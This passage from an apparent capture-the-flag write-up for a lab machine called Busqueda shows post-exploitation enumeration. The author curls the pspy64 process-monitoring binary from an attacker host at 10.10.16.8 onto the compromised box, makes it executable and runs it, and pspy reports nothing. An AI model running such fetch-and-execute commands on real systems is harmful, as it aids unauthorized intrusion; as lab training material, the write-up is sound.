Busqueda_PSPY

PSPY

---

Enumerating processes is not available likely due to lack of privileges Opting out to capture running processes with PSPY

svc@busqueda:/dev/shm$ curl -s http://10.10.16.8/pspy64 -o ./pspy64 ; chmod 755 ./pspy64

Delivery complete

svc@busqueda:/dev/shm$ ll
total 0
0 drwxrwxrwt  2 root root   40 nov 27 17:57 .
0 drwxr-xr-x 20 root root 4.0k nov 27 15:51 ..

A moment later, content within the directory is WIPED OUT This surely indicates that there is a running cronjob

svc@busqueda:/var/tmp$ curl -s http://10.10.16.8/pspy64 -o ./pspy64 ; chmod 755 ./pspy64

svc@busqueda:/var/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
 
 
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     
 
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

Executing PSPY

Nothing found